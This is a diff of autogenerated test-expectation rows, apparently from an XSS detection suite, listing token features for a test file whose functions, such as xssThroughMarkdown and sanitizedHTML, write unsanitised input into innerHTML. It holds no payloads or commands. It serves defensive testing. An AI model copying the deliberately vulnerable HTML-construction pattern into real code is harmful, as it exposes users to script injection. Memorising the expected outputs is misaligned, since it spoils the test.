constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:41:23:49 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:41:23:49 | innerHTML | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:41:23:49 | innerHTML | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:41:23:49 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:53:23:56 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:15 | striptags | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:15 | striptags | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:15 | striptags | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:15 | striptags | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | stripta ... ptags') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | stripta ... ptags') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | stripta ... ptags') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | striptags | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | striptags | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:7:26:38 | striptags | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:25 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:25 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:25 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | exceptional return of require('striptags') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | exceptional return of require('striptags') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | exceptional return of require('striptags') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | require('striptags') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | require('striptags') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:19:26:38 | require('striptags') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | calleeImports | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:26:27:26:37 | 'striptags' | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:28 | module. ... zedHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:28 | module. ... zedHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:27:28 | module. ... zedHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:30:1 | module. ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:30:1 | module. ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:1:30:1 | module. ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:8:27:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:8:27:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:8:27:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:16:27:28 | sanitizedHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:16:27:28 | sanitizedHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:16:27:28 | sanitizedHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | striptags | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | striptags | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | striptags | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | striptags | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | striptags | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | this | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | this | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:27:31 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | exceptional return of anonymous function | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | exceptional return of anonymous function | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | functio ... html;\\n} | assignedToPropName | sanitizedHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | functio ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | functio ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | return of anonymous function | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | return of anonymous function | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:32:30:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:27:42:27:42 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:14 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:14 | html | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:14 | html | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:14 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html = ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html = ... span>") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html = ... span>") | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html = ... span>") | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:11:28:52 | html = ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:26 | striptags | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:26 | striptags | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:26 | striptags | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:26 | striptags | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:26 | striptags | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | exceptional return of stripta ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | exceptional return of stripta ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | exceptional return of stripta ... span>") | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | exceptional return of stripta ... span>") | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | exceptional return of stripta ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | stripta ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | stripta ... span>") | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:18:28:52 | stripta ... span>") | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | @@ -22954,6 +151515,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:35 | "" | enclosingFunctionName | sanitizedHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:35 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:35 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:39 | "" + s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:39 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:39 | "" + s | enclosingFunctionBody | s html striptags s document querySelector #sanitized 